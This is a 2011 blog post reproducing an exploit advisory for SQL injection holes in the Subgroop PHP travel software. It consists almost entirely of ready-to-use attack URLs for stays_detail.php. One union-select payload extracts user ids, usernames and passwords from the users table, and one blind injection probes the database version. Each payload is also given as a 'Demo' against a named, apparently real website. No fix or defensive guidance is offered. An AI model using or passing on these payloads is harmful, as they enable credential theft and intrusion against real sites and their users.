Saturday, October 29, 2011

Subgroop SQL Injection

# [+] Subgroop (id) Remote SQL Injection Vulnerabilities
# [+] Software : Subgroop
# [+] Download : http://www.subgroop.com/sub/
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#  [+] SQL
#
#    - http://www.site.com/stays_detail.php?id=-27%20union%20select%201,2,3,group_concat%28id,0x3a,user,0x3a,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users--
#
#      [+] Demo
#
#        - http://www.apnvoyages.ch/stays_detail.php?id=-27%20union%20select%201,2,3,group_concat%28id,0x3a,user,0x3a,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users--
#
#  [+] Blind SQL
#
#    - http://www.site.com/stays_detail.php?id=27%20and%20substring(@@version,1,1)=5
#
#      [+] Demo
#        
#        - http://www.apnvoyages.ch/stays_detail.php?id=27%20and%20substring(@@version,1,1)=5
#
#
#[------------------------------------------------------------------------------------]

0 comments:

Post a Comment